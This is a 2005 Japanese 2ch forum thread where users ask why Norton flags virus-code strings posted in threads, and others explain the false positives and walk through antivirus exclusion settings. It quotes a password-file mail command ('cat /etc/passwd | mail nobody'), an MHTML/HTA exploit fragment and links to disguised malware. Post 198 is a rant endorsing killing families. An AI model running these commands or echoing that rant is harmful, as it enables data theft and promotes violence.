  (/ /)  (|  |)
  < ̄<  < ̄<

 ハイ! ハイ! ハイ
  (. `Д)_(Д´ )
  ノ ノヽ |  |>
  ノ >  < ヽ

     ハイ!
  (.   )_(`Д´)ノ
  ノ ノヽ |ヘ |
  ノ >    <

     ハイ!     ワァオ!
  (゜∀゜)_(゜∀゜)ノ
  ノ ノヽ |ヘ |
  ノノ     <

  あるある探検隊!
 _(Д´ )  _(Д´ )
  ヘ|  |\  ヘ|  |\
    <     <

  あるある探検隊!
  ( `Д)_ ( `Д)_
 /|  |ヘ   /|  |ヘ
   >       >

75 :ひよこ名無しさん:2005/04/25(月) 01:12:19 ID:???
ウイルス対策ソフトの検出力調査結果
http://www.geocities.jp/stealrush/security.html

76 :ひよこ名無しさん:2005/04/27(水) 04:32:31 ID:???
http://news18.2ch.net/test/read.cgi/anime/1114540249/
>>17の奴のウイルスってどうやって除外するんですか?本気でむかつきます


77 :ひよこ名無しさん:2005/04/29(金) 17:10:59 ID:EryoL680
>>71
初心者はテンプレ読んでも何を言っているのかが分からなかったりするので
こういう細かい解説、感謝します。
っていうか大空寺死んで欲しい。(´・ω・`)

78 :ひよこ名無しさん:2005/04/29(金) 18:11:53 ID:xmX9upML
>>77
透明あぼーんで存在を消し去りましょう。スッキリするよ

79 :ひよこ名無しさん:2005/04/29(金) 18:38:53 ID:EryoL680
>>78
透明あぼーんではノートンの反応はおさまらなかったんです。
なにやらメール欄に変なものを書き込んでいるようで。

80 :cen ◆Pm9xOTJuM. :2005/04/29(金) 18:42:27 ID:??? ?###
>>79
>>17のを使うと、メール欄のものでも消し去ります。


81 :ひよこ名無しさん:2005/04/29(金) 18:44:17 ID:???
>>79
>>71の手順でノートンの誤反応を解消し、専ブラの透明あぼーんで
糞コテやウイルス厨を見えなくするって意味。
分かりにくくてスマソ

82 :ひよこ名無しさん:2005/04/29(金) 19:58:14 ID:EryoL680
>>80
>>81
いろいろとありがとうございました。
あいつら(大空寺とかネオとか)どうにかならないもんですかね…

83 :ひよこ名無しさん:2005/05/01(日) 13:50:58 ID:beE/OXQq
XPにはNorton AntiVirusインストールできたのに、98にはできない。
98のウイルススキャン(無償)で感染ファイル35ってでたけど
これをどうすればいいの?


84 :ひよこ名無しさん:2005/05/05(木) 01:29:28 ID:???
Live2chでUnixPenguinがうざい場合
(1)タスクトレイに入っているNorton AntiVirusのアイコンを右クリック
(2)「Norton AntiVirusの設定」をクリック
(3)左側にある「Auto-Protect」をクリック
(4)その下に出てきた「除外」をクリック
(5)「除外する項目」の「新規」をクリック
(6)「C:\Program Files\Live2ch\log」と入力し、「サブフォルダも含める」にチェックを入れ、「OK」をクリック
(6)「C:\Program Files\Live2ch\temp.htm」も追加する。
(7)左側にある「Auto-Protect」をクリック
(8)(4)〜(6)をもう一度繰り返す
(9)設定画面が消えるまで「OK」をクリックする


85 :cen ◆Pm9xOTJuM. :2005/05/05(木) 01:48:13 ID:??? ?##
あ、そうそう。
>>17のプログラムを更新しましたです。


86 :ひよこ名無しさん:2005/05/06(金) 13:08:01 ID:???
その他→脅威カテゴリでも「除外」が出てくるけどここは設定しなくていいの?
って、脅威カテゴリで何をしてくれるのかのかよくわからない。(NIS2005)


>>71 >>84
>(7)左側にある「Auto-Protect」をクリック

(7)左側にある「手動スキャン」をクリック ・・・じゃないのかな。

87 :ひよこ名無しさん:2005/05/06(金) 13:10:11 ID:???
大体、「除外」する項目をAuto-Protectと手動スキャンで
分けている理由がわからない。NIS2002の設定は簡単だった。

88 :ひよこ名無しさん:2005/05/08(日) 22:01:59 ID:???
ttp://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8

89 :ひよこ名無しさん:2005/05/11(水) 23:56:43 ID:TkQmWlam
cat /etc/passwd | mail nobody
これが反応するのか?

90 :ひよこ名無しさん:2005/05/12(木) 00:23:51 ID:???
>>89
見事にUnixPenguinと判定してくれた

91 :ひよこ名無しさん:2005/05/13(金) 19:15:33 ID:???
f

92 :ひよこ名無しさん:2005/05/18(水) 02:51:07 ID:iHDhJttO
>>84

Live2chでUnixPenguinがうざい場合

IEでうざい場合はどうすればよろしいのでしょうか?????

93 :ひよこ名無しさん:2005/05/18(水) 02:53:32 ID:???
>>92
IEで2ちゃん見るなよ。

94 :ひよこ名無しさん:2005/05/18(水) 03:04:55 ID:iHDhJttO
>>93

え???
ダメなんですか???

すみません・・・
初心者なもので・・・

詳しく教えていただけませんか・・・

95 :ひよこ名無しさん:2005/05/18(水) 03:09:44 ID:???
>>94
ダメじゃないけど、専用ブラウザのほうがずっと便利。
どこまで読んだかわかるし、ログはずっと残せるし、
新着分だけダウンロードするから速いし、軽いし。

96 :ひよこ名無しさん:2005/05/18(水) 03:13:22 ID:iHDhJttO
>>95

ありがとうございます。
勉強になりました。

今日はウイルスが出てかなりテンパりました(苦笑)
また明日からがんばります!

でしつこいんですが、
IEでうざい場合はどうすればよろしいのでしょうか?


97 :ひよこ名無しさん:2005/05/18(水) 03:17:42 ID:???
>>96
IEの一時フォルダを除外すれば警告は出なくなるが、
ほかのサイトで感染してしまう。

98 :ひよこ名無しさん:2005/05/22(日) 02:22:35 ID:GqakRWGu
勇気が無くて見られない画像解説スレ Part702
http://etc3.2ch.net/test/read.cgi/entrance/1116419123/
すいません、↑のスレッドをLive2chで開いただけで

発生源:C:\Documents and Settings\kousuke\Local Settings
\Temporary Internet Files\Content.IE5\MVAP076F\woid[1].jpg
Trojan Horse
とか出るんですけど、誤反応ですか?
vbsのウィルスコードと大空寺のメール蘭攻撃は
除外しているはずなんですが。
ありえないとは思いますがて開いただけで感染したんですか?
Trojan Horse
ウィルス名:
Trojan Horse
別名:
感染場所:
.EXE ファイル

99 :ひよこ名無しさん:2005/05/22(日) 02:28:48 ID:???
>>98
そのファイルはjpgじゃなくて、exeということらしい。
誤反応ではなくて、本物。
スレを開いただけでは感染しないけど、
その画像ファイルをIEで開くと感染する可能性がある。

100 :98:2005/05/22(日) 02:46:42 ID:GqakRWGu
>>99
おそらく原因のレスは
http://etc3.2ch.net/test/read.cgi/entrance/1116419123/899-
だと思いますが、これ画像そのものはクリックしてないんですが
ただスレッドを開いた瞬間ノートン先生が激しく怒ったス
ログを見ても
アクセスが拒否されました。
修復できませんでした。
としか出てません。
最新のウィルス定義ファイルを落とさないと駆除できないみたいですが、
これは最近のということでしょうか?
そして、今自分のPCにTemporary Internet Filesや
他の場所にウィルスが潜伏してるということはないんでしょうか?それを開くとアウツみたいな。

101 :ひよこ名無しさん:2005/05/22(日) 02:49:13 ID:???
>>100
そこの899だよ。
でも、ノートンが隔離してるはず。
そうでなくても、IEの一時ファイルをクリアして、ごみ箱を空にするだけでいい。

102 :98:2005/05/22(日) 02:51:49 ID:GqakRWGu
>>101
レスサンクス
この.jpgブラクラは最近登場したんでしょうか
これからまた誤反応する人とかいっぱいでるんでしょうか

103 :ひよこ名無しさん:2005/05/22(日) 02:52:55 ID:???
>>102
だから、誤反応じゃないって言ってるのに。

104 :98:2005/05/22(日) 02:57:16 ID:GqakRWGu
モノホン反応ですか、ノートン使ってる人は
反応でますよね?どうするんでしょうかこれ

105 :98:2005/05/22(日) 03:04:15 ID:???
あ、ノートン使ってても
画像ポップアップ有効にしてないと意味ないのか

106 :ひよこ名無しさん:2005/05/22(日) 03:05:41 ID:???
>>104
Q.画像プレビューや画像ポップアップでアンチウィルスソフトが反応する事がある
A.画像プレビューも画像ポップアップもイメージタグで表示するだけなので、
 仮にそれがウイルスだったとしても、あくまで画像として処理され、
 ウイルスのコードが実行される事はないので安全。気にする事なし。

107 :98:2005/05/22(日) 03:06:20 ID:???
>>106
サンクス、どうもでした(=゚ω゚)ノシュ

108 :ひよこ名無しさん:2005/05/22(日) 21:11:27 ID:zQU5xhse
テスト

109 :ひよこ名無しさん:2005/05/23(月) 00:27:44 ID:C8+JokU/
ms-its:mhtml:file://c:\
kak.hta';ken=wdt'START

この二つに激しくノートンが反応するんですが
これも誤反応ですか?vbsとは違う種類みたいですが

110 :ひよこ名無しさん:2005/05/23(月) 00:30:33 ID:???
>>109
誤反応
ただの文字列では何も出来ない。

111 :ひよこ名無しさん:2005/05/23(月) 00:38:46 ID:???
>>110
sankusu

112 :ひよこ名無しさん:2005/05/23(月) 00:39:33 ID:???
>>109

113 :ひよこ名無しさん:2005/05/23(月) 12:52:25 ID:???
age

114 :ひよこ名無しさん:2005/05/23(月) 21:27:57 ID:AIqAZiI7
すみません。初心者スレッドから誘導されてきました。

このスレに来る時もそうでしたが、あるスレに行くと
ノートンが反応して「修復できません」と表示されます。
結果「Bloodhound.Exploit.6」を検疫することで
通常の状態に戻るようなのですが、
「Bloodhound.Exploit.6」ファイルを検疫項目の中から
右クリックで削除してもよいものでしょうか?

どなたか教えてください。お願いいたします。

115 :ひよこ名無しさん:2005/05/23(月) 21:31:20 ID:???
まず専ブラ入れれ

116 :114:2005/05/23(月) 21:44:11 ID:AIqAZiI7
>>115
はい。検討します。これ↓

「Bloodhound.Exploit.6」ファイルを検疫項目の中から
右クリックで削除してもよいものでしょうか?

についてはどうでしょうか?

117 :ひよこ名無しさん:2005/05/23(月) 21:49:16 ID:???
それはすべきじゃないから
専ブラ入れてからログのフォルダを除外設定にするのよ
このへんよめ
ttp://www.sannet.ne.jp/storage/exclude/norton.html

118 :114:2005/05/23(月) 22:07:32 ID:AIqAZiI7
>>117
なるほど、そうですか。
どうもありがとうございました。

119 :ひよこ名無しさん:2005/05/24(火) 11:39:34 ID:xooP0kni
青空さんは山田砲撃たれたことないの
もういっぺん感染してほしいの

120 :ノtasukeruyo:2005/05/24(火) 16:56:41 ID:1JBRx0B0
>>117
>114と同様の警告がでます。
どういったウイルスなのでしょうか。

http://tmp5.2ch.net/test/read.cgi/mog2/1116912441/ >>4
で拾ったようなのですが

スレ違いだったらごめんなさい。

121 :ひよこ名無しさん:2005/05/24(火) 16:59:06 ID:???
>>120
ttp://www.google.co.jp/search?hl=ja&q=Bloodhound.Exploit.6&lr=lang_ja

122 :120:2005/05/24(火) 17:00:31 ID:???
専ブラはJane派生系使ってます

123 :120:2005/05/24(火) 17:03:19 ID:???
>>121
ありがとうございます。m(__)m

124 :ひよこ名無しさん:2005/05/25(水) 00:18:25 ID:???
先日脳豚先生が誤動作したんだけど、そんときに「Bloodhound.Exploit.6」
ってのが誤検出されたんだが、誤検出だっつってんのに
納得しないやからがいる。

どっかで↑みたいなのが検出されても誤動作だって
わかるように解説してるページない?

125 :ひよこ名無しさん:2005/05/25(水) 00:22:44 ID:???
>>1

126 :ひよこ名無しさん:2005/05/28(土) 00:50:41 ID:tmw7KRqu
UnixPenguinと言う名のウィルスが5/6に感染していた事が先ほどわかり
ファイルを削除 しかしパソを再起動したらそのファイルがありました
ファイルを削除したら普通消えるのでは?
5/6に感染してたって事は、20日以上気づかないで放置って事は・・・ヤバイ?

127 :ひよこ名無しさん:2005/05/28(土) 00:52:54 ID:???
>>126
まさか「誤反応」の意味がわからない?

128 :ひよこ名無しさん:2005/05/28(土) 00:55:51 ID:tmw7KRqu
誤反応???まじで?
アタッマきたんでまたファイル消したら完全にファイル消えたよw

129 :ひよこ名無しさん:2005/05/29(日) 11:51:31 ID:???
(・∀・)スンスンスーン♪

130 :ひよこ名無しさん:2005/05/29(日) 11:55:12 ID:???
( ゚д゚)ハッ!

131 :ひよこ名無しさん:2005/05/30(月) 14:53:36 ID:???
とあるスレを見ようとするとノートン先生が反応します。
ウィルス「MHTML Redir.Exploit」
実害は無い感じなので
反応したと思われるlogを削除しただけですが
これもまた誤反応なのでしょうか?

132 :ひよこ名無しさん:2005/05/30(月) 14:59:34 ID:???
ちなみにギコなびを使っています。

133 :ひよこ名無しさん:2005/05/30(月) 18:45:45 ID:???
失礼します。
IEを使用していますが、板や特定スレを開くとウイルス反応がでます。
削除しようとしても削除できないため、除外しておいていますが
問題はないんでしょうか?
削除も検疫など有効と思われることが出来ないのでしょうがなく
除外している状態です。上の方で削除のことがでてますが削除しないと問題ありますか。

134 :ひよこ名無しさん:2005/05/30(月) 23:34:04 ID:???
>>133
多分ウイルスに似たコードを載せている為にウイルスと誤認識して反応しているだけですよ。

135 :ひよこ名無しさん:2005/05/30(月) 23:36:25 ID:???
なんだか>>40と同じ症状です。

症状というのは【Unix Penguin】というウイルスコードが最近になって反応するようになりました。
専ブラのフォルダはサブフォルダ含めてAuto-Protectと手動スキャンの除外項目に確実に入っています。
その為、その場所は反応しないのですが一時ファイル(キャッシュ)の場所が反応しています。
一時フォルダも除外指定すれば簡単なんですけど、他のサイト閲覧する時とか
安置ウイルスの役割してくれないらしいので除外したくありません。
今まで一時ファイルは反応しなかったのに今更反応するのが、どうしてなのか分かりません。

専ブラはJANE使用。Norton AntiVirusは10.0.10.13gバージョン使用。
因みにOSはXPのHOMEです。アドバイスおねがいします。

136 :ひよこ名無しさん:2005/05/31(火) 10:18:11 ID:???
>>134
レスありがとうございます。
Auto-Protectでひっかかるんですが>>39を読むと除外でも
問題なさそうですね・・・?大丈夫かな。
ただ>>135を読むと除外もよくないみたいでどうしたらいいのかとも思う。

137 :名無しさん@お腹いぱーい。:2005/05/31(火) 12:22:06 ID:??? ?#
>>135
> なんだか>>40と同じ症状です。
> 症状というのは【Unix Penguin】というウイルスコードが最近になって反応するようになりました。
> 専ブラのフォルダはサブフォルダ含めてAuto-Protectと手動スキャンの除外項目に確実に入っています。

スレッドタイトルに反応したんじゃないかな。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq08

Janeの場合はfavorites.dat
ε三(; ・∀・)鯖マデオツカイの場合result.datを除外に加えてね。


> その為、その場所は反応しないのですが一時ファイル(キャッシュ)の場所が反応しています。
> 一時フォルダも除外指定すれば簡単なんですけど、他のサイト閲覧する時とか
> 安置ウイルスの役割してくれないらしいので除外したくありません。
> 今まで一時ファイルは反応しなかったのに今更反応するのが、どうしてなのか分かりません。
> 専ブラはJANE使用。Norton AntiVirusは10.0.10.13gバージョン使用。
> 因みにOSはXPのHOMEです。アドバイスおねがいします。

ブラウザでスレを開いたんじゃないかな。
>>10で一時ファイルの削除の仕方があるので見てね。


>>136
IEの一時ファイルを除外にしないで
2ちゃんねるブラウザのログフォルダを除外にしてください。


>>135>>136
2ちゃんねるブラウザのより細かい設定はそれぞれの2ちゃんねるブラウザのスレで確認してね。
ソフトウェア
http://pc8.2ch.net/software/

138 :ひよこ名無しさん:2005/05/31(火) 19:09:47 ID:Smprwa5o
初歩的な質問なんですが教えてもらえませんか?
何故ノートンだけが反応するんですか?
ノートンで反応したファイルを消さず、ウィルスバスターに反応するか試しましたが、反応なしでした。
【Unix Penguin】は、ウィルスなんですよね?
なのに何故・・・?

139 :ひよこ名無しさん:2005/05/31(火) 19:18:29 ID:???
先生はよく間違えますが本物を逃すこともありません

140 :ひよこ名無しさん:2005/05/31(火) 19:20:25 ID:???
>>138
ノートンは、ごく一部の文字列がファイルに含まれてるだけでウイルスと診断してるから。
判定の手抜きと言っていい。
もちろん、2ちゃんのログがウイルスとして機能する可能性は皆無。

141 :138:2005/06/01(水) 22:06:01 ID:9OpZge8m
>>140
レスありがとう
それにしてもこんなイタズラいったい誰が・・・

142 :ひよこ名無しさん:2005/06/01(水) 22:49:26 ID:???
>>131
まったく同じような症状がでます。
自分はブラウザをjaneを使っているんですが、
ノートンのオンラインスキャンをすると、
C:...\openjanedoe-0.1.11.0\Logs\2ch\ネット関係\セキュリティ\数字.dat は
MHTMLRedir.Exploit に感染しています
と出ます。何度やっても。
これは感染しているのか?それとも誤反応なのか?
物凄い不安です。ノートン以外では反応しないので。

143 :cen ◆Pm9xOTJuM. :2005/06/01(水) 23:47:27 ID:??? ?##
>>142
>>17のでdatのスクリプトを無効化してみるといいかもです。


144 :ひよこ名無しさん:2005/06/04(土) 14:57:06 ID:??? ?##
除外をログフォルダだけじゃなく、C\ProgramFile\Live2chにしたんだけど
危険かなぁー。

145 :ひよこ名無しさん:2005/06/04(土) 15:13:05 ID:???
>>144
ログだけにしといた方がいい

146 :ひよこ名無しさん:2005/06/07(火) 21:55:56 ID:???
わぁ、それらしいレスの内容をメモ帳に貼り付けて保存した瞬間、ノートン先生に持ってかれちゃったよぅ!

147 :ひよこ名無しさん:2005/06/08(水) 10:11:07 ID:???
ttp://www.uploda.org/file/uporg121567.wmv

148 :ひよこ名無しさん:2005/06/08(水) 10:11:48 ID:???
147誤爆ですごめんなさい

149 :ひよこ名無しさん:2005/06/08(水) 22:39:06 ID:???
age

150 :ひよこ名無しさん:2005/06/09(木) 06:32:01 ID:/DokQMWm
ノートパソコンなんですが、キーボードの隙間にゴミが入ってキーが押しにくくなって困る

151 :ひよこ名無しさん:2005/06/09(木) 22:09:48 ID:c+f8GHIp
パソコンの電源入れると最初にseeqという検索サイトが出る
ようになっちまいました。以前はMSNだったんですけど、昔の体に
戻れますか?戻し方教えてください

152 :ひよこ名無しさん:2005/06/09(木) 22:24:05 ID:???
>>151
スレ違いだけど、システムの復元で直前の日付に戻せ。

153 :ひよこ名無しさん:2005/06/09(木) 22:45:34 ID:c+f8GHIp
スレ違いですか、すみません。パソコン初心者なん
システムの復元ってどうやるんですか?

154 :ひよこ名無しさん:2005/06/09(木) 22:46:44 ID:???
>>153
http://www.google.co.jp/search?hl=ja&q=%E3%82%B7%E3%82%B9%E3%83%86%E3%83%A0%E3%81%AE%E5%BE%A9%E5%85%83&lr=lang_ja

155 :ひよこ名無しさん:2005/06/09(木) 22:48:38 ID:???
ありがとうございます がmばってみます

156 :ひよこ名無しさん:2005/06/09(木) 22:51:53 ID:???
最近また急激に増えたな。
ウイルスバスターloveのやつらのしわざか?

157 :151:2005/06/09(木) 22:54:18 ID:???
OSが2000なんですけど… 復元できないみたいです

158 :ひよこ名無しさん:2005/06/09(木) 22:55:26 ID:???
>>157
リカバリしろ

159 :151:2005/06/09(木) 22:58:46 ID:???
リカバリってお金出して修理みたいですね…

160 :ひよこ名無しさん:2005/06/09(木) 22:59:32 ID:???
>>159
自分でできる。取扱説明書を150回嫁

161 :151:2005/06/09(木) 23:02:46 ID:???
読みます!
最近外国のサイトの広告みたいのが表示されることがあって…
リカバリでその辺も治りますか?

162 :ひよこ名無しさん:2005/06/09(木) 23:09:30 ID:???
>>161
直る

163 :ひよこ名無しさん:2005/06/09(木) 23:09:42 ID:???
>>161
基本的には、リカバリで買った時と同じ状態になる。
従って、データは全部消えるので、気をつけて。

164 :151:2005/06/09(木) 23:14:51 ID:???
ありがとうございました!
今度はデータのバックアップについて勉強しないといけなそうですね。
ちなみに何の広告なんですかねこれ↓
http://adserver.sharewareonline.com/AdServer/RegClean/Exact/landing_EAL.htm
ダウンロードしろって感じで頻繁に表示されるんです

165 :ひよこ名無しさん:2005/06/10(金) 19:44:30 ID:Z3xy6uEy
スミマセン。他のスレから誘導されてきました。
VIP板をリロードすると毎回ノートン先生がウイルス警告してくるんですがなぜですか?
ウイルス名     Bloodhound.Exploit.6
適用した処理   ファイルを修復できません。

と出てOKを押した後に
ウイルス名     Bloodhound.Exploit.6
適用した処理   ファイルへのアクセスが拒否されました。

とでます。
VIP以外の板ではこのような警告は出ません。ノートンは2005年の新しいやつです。
ウイルススキャンしてみましたが問題ありませんでした。
OSはXPです。
よろしくです。

166 :ひよこ名無しさん:2005/06/10(金) 20:58:43 ID:???
このスレの最初のへん読めばわかるよ

167 :165:2005/06/12(日) 02:06:13 ID:CFzaInzJ
>>166
あの。。。いろいろみましたけど専門用語ばかりでよくわかりません。
半年ROMはすでに経験墨です。
できたら詳細も教えていただきたいのですが。

168 :ひよこ名無しさん:2005/06/12(日) 02:08:54 ID:???
>>167
ノートン捨てるんだ。

169 :ひよこ名無しさん:2005/06/12(日) 14:33:06 ID:???
>>167
>7

170 :165:2005/06/12(日) 14:54:46 ID:Yt6W8JkL
普通に感染されてました。。。
検疫というのをしたら問題のファイルがどっかいったみたいです。


171 :ひよこ名無しさん:2005/06/13(月) 00:20:19 ID:vyhhOQ6i
http://sakura01.bbspink.com/test/read.cgi/ascii/1118577161/
ここのウイルスコードで出来たスレタイをクリックしてから、
すべての板で書き込むたびに誤作動をおこします・・・・
それでここへたどりついたのですが、

>NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。

これって具体的にどうすればいいのでしょうか?
・オートプロテクト
・除外
・除外する項目
とまでは出来たのですが、最後の「除外する項目」に何かを入れるのですか?
それとも項目を削除するのですか?
何を入れたらいいのか、何を削除すればいいのか教えてください・・・。

今現在の項目はこの3つです
*.dbx
*.nch
*.sysutem volume information

ライブ2ちゃん使用です。

172 :ひよこ名無しさん:2005/06/13(月) 00:22:19 ID:???
>>171
ログのあるフォルダーのバスを追加する

173 :ひよこ名無しさん:2005/06/13(月) 00:25:28 ID:vyhhOQ6i
>>172
よければ手順を・・・・まったく意味が分かりません・・・・

174 :ひよこ名無しさん:2005/06/13(月) 01:00:06 ID:vyhhOQ6i
>>7を参考に、
Cドライブ→プログラム→ライブ2ちゃん→ログ
とういう感じでログをノートンの除外に選択したら、半角板を開いただけでノートンが反応することはなくなりました。
しかし、すべての板で書き込むたびにノートンが反応するっていうのは直りません。

どうすればいいですか?

175 :ひよこ名無しさん:2005/06/13(月) 01:04:12 ID:vyhhOQ6i
「kakikomi」というのも除外に選択したらなおりました。おさがわせいたしました。

176 :ひよこ名無しさん:2005/06/13(月) 01:53:23 ID:vyhhOQ6i
半角を踏んだらウイルス反応(誤作動)する方へ


専用ブラウザlive2chとノートンを使ってる方へ
http://sakura01.bbspink.com/test/read.cgi/ascii/1118594197/


177 :名無しさん@お腹いぱーい。:2005/06/13(月) 15:14:46 ID:ZBKBALPS ?##
てす

178 :名無しさん@お腹いぱーい。:2005/06/13(月) 16:16:31 ID:??? ?##
>>171-176


ノートントラップ
http://ansitu.xrea.jp/guidance/?Trap#NortonTrap
Q8.2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか?
http://ansitu.xrea.jp/guidance/?NortonInternetSecurity#faq08

※スレタイがノートントラップのスレに書き込んだ場合、書き込み履歴も反応します。


2chWikiは申請中。

179 :ひよこ名無しさん:2005/06/13(月) 21:20:42 ID:IDZd2XHn


180 :ひよこ名無しさん:2005/06/13(月) 21:42:48 ID:+eHKR6hW
ノートンがvbsウィルスのソースに誤反応、
ってスレタイにもあるけど、ビューア経由でも反応するんですか?
スレによっては、IEと使い分けてるんですが、ビューアで開いた時に
限って怒られるんです・・・。

181 :ひよこ名無しさん:2005/06/13(月) 21:44:03 ID:???
ノートン捨てちゃえ

182 :ひよこ名無しさん:2005/06/13(月) 21:49:48 ID:???
>>175
ウイルスを書き込んだのですか、ああ、そうですか。

183 :180:2005/06/13(月) 21:55:46 ID:???
>>176
ご回答ありがとうございます!助かりました(←大馬鹿)!


184 :ひよこ名無しさん:2005/06/14(火) 15:17:13 ID:???
>>170
詳しく。
漏れも同じ症状でビビってる。

185 :ひよこ名無しさん:2005/06/14(火) 15:43:32 ID:???
>>184
>>178

186 :ひよこ名無しさん:2005/06/15(水) 07:07:41 ID:MyWTZaCo
祭り中でーすw

http://www.bonotto.jp/news/img/newstT41RK.jpg

韓国の小学生が描いた絵
http://society3.2ch.net/test/read.cgi/korea/1118763706/

187 :縞んてっく:2005/06/15(水) 09:22:16 ID:???
脳豚を入れているユーザは2ちゃんを見ないようにしてください。

188 :ひよこ名無しさん:2005/06/15(水) 15:31:52 ID:???
avast!入れてる貧乏人の俺はどうですか?

189 :ひよこ名無しさん:2005/06/15(水) 21:11:20 ID:MbvAfu2/
ttp://fuckingreset.cesarsoft.com.ar/files/virus/!!!!!!!!!christinexhot.jpg.bat
ウィルス注意↑
これ多分ウィルスですが、貼られたスレッドを開いただけでノートン反応します
これも>>98同様、誤反応ですよね?

190 :ひよこ名無しさん:2005/06/15(水) 22:55:11 ID:???
(((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク

191 :名無しさん@お腹いぱーい。:2005/06/18(土) 23:57:40 ID:??? ?##
http://pc8.2ch.net/test/read.cgi/sec/1118586631/5
Q. 2chのスレを2chブラウザで開くと、ウイルスを検出するんだけど
A. avast!はノートンと同じく、ウイルスコードも検出する。
ただのテキストのコードなのでウイルスに感染することはない悪戯行為だから気にしないで大丈夫。
誤検出しないようにするには、以下の2通りの方法がある。

・avast!の標準シールドの感度を [普通] に設定 or avast!の標準シールドの例外設定に2chブラウザのdatフォルダを設定
・2chブラウザでWebシールドを使わないように設定

http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq12



>>189
それだけではわかりません。
そのようなリンクを貼られるようなスレではノートントラップも貼られていたのかもしれませんし、
あなたがリンク(他にも同様な悪意あるリンク)を踏んでいて反応したのかも
(2ちゃんねるブラウザによっては画像サムネイル機能が働いて画像ファイルに偽装されたウイルスに反応することがあります。・・・正常な反応です。)

リンクを不用意に踏まないことも肝心です。
>>4
尚、ここはウイルス鑑定スレではありません。
危ないと思ったURLはラウンジ板等の”勇気が無くて見られない画像解説スレ”で診てもらいましょう。
http://find.2ch.net/?STR=%CD%A6%B5%A4%A4%AC%CC%B5%A4%AF%A4%C6+%B2%F2%C0%E2%A5%B9%A5%EC&COUNT=50&TYPE=TITLE&BBS=ALL

192 :ひよこ名無しさん:2005/06/20(月) 18:43:13 ID:???
ひろゆきは2ch総合案内に対処法載せてくれないの?
初心者はこんな所見ないと思うのだが…

193 :ひよこ名無しさん:2005/06/20(月) 19:34:26 ID:???
>>192
そんなこと書かなくても、根本的に対策できるのに3年以上放置。
ノートンも放置。
そんなもんさ。

194 :ひよこ名無しさん:2005/06/20(月) 20:01:35 ID:???
サイトの問題ではなくて、ノートンとそのユーザーの問題だからでしょ。
どうしても見て欲しい、書き込みして欲しいと思えばそういうこともするだろうけど、
めんどくさいから、対策できない人は切捨てって考えてるんでしょ。

195 :ひよこ名無しさん:2005/06/22(水) 01:42:06 ID:???
ニュース速報みてたらノートン先生が激怒しました!今、スキャン中何かすごい不安

196 :ひよこ名無しさん:2005/06/22(水) 01:50:09 ID:???
年取ると怒りっぽくなるよね

197 :ひよこ名無しさん:2005/06/22(水) 01:59:11 ID:???
ハァ?

198 :ひよこ名無しさん:2005/06/22(水) 06:30:50 ID:???
まぁ今危ぶまれている年間自殺者3万人なんていうのもさぁ
何だかんだ言ってお友達と楽しく戯れていた全共闘世代のジジイがほとんどで
そんな奴らのノスタルジーとニートの絶望的な孤独を一緒にされちゃあかなわないよね。

まぁ政府も腹の底じゃあ、このままズルズルと大人になって勝手に死んでくれりゃあ本望
とか思ってるだろうケドさあ、俺達には一人一人明確な敵がいるんだよね。
原因があっての結果。
勉強しなきゃ立派な大人になれませんよなんて乳幼児でも知ってることを
やらなかったらこうなった、なんて言い切れるほど楽天家じゃないんだよね。

アホみたいな受験戦争、家畜のような体罰教育、友達からの陰湿なイジメ、見知らぬ大人のいやがらせ

バブル期に子供にだけ苦労させて親やセンセや同級生は泡まみれで遊び放題。
敷かれたレールの先に娯楽があると鞭打たれ、苦難を乗り越えたどり着いたら就職難。
ゴミのように切り捨てられていく俺らの10代、20代。
いつの間にか自分より馬鹿が出世して、自分よりブサイクが結婚し、自分より足の遅いヤツがオリンピックに出ている。

両親を恨む者、先生の居所を探す者、同僚の近況を探る者、誰でもいいから殺してやりたいと思っている者
そんなヤツらがじっと己の部屋で計画を練っている。
まぁはっきり言わせてもらえば、あんたら、幸せ家族を気取っているのも今のうちだね。

鬱ブームだかなんだか知らないが、テレビ一つ落ち着いて見られなかったような俺らに
勝者、敗者とか貧乏さん番組なんてメディア戦略は通用しないね。

殺されるまえに、必ず殺す。
そう、この先10年。
被害者の過去2-30年を遡らないと犯人が割り出せない
そんな一家まるごと惨殺事件が続くだろうね・・

199 :ひよこ名無しさん:2005/06/22(水) 14:52:29 ID:???
age

200 :ひよこ名無しさん:2005/06/23(木) 20:20:22 ID:???
>>192
ひろゆきは初心者大嫌い
ひっかかって嘆くユーザーをみてニヤニヤしてます
それが嫌なら来るなって考え

201 :ひよこ名無しさん:2005/06/24(金) 11:57:13 ID:???
先生が反応しBloodhound.Exploit.6が出現!
みなさんどう?

202 :ひよこ名無しさん:2005/06/27(月) 15:24:14 ID:???
age

203 :ひよこ名無しさん:2005/06/28(火) 21:44:54 ID:???
>>201
前にそれありましたけど。(当方Jane Doe Style)
反応した部分の過去ログ捨てたら何も問題なかったですよ。

204 :ひよこ名無しさん:2005/06/28(火) 21:49:26 ID:???
>>201
それはログのウイルスコードに反応してるだけだからむっしっし

205 :ひよこ名無しさん:2005/06/29(水) 10:53:00 ID:???
age

206 :ひよこ名無しさん:2005/06/30(木) 09:46:32 ID:???


207 :cen ◆Pm9xOTJuM. :2005/07/03(日) 02:02:31 ID:2e/PomzS ?##
そうそう。
>>17のソフトをアップデートしたので、よかったらダウンロード
してくださいです。
http://www.geocities.jp/cen_hp/index.html

208 :ひよこ名無しさん:2005/07/03(日) 02:21:24 ID:???
>>207
ウィルス注意!!

209 :ひよこ名無しさん:2005/07/03(日) 11:33:52 ID:???
>>207
見損ないました

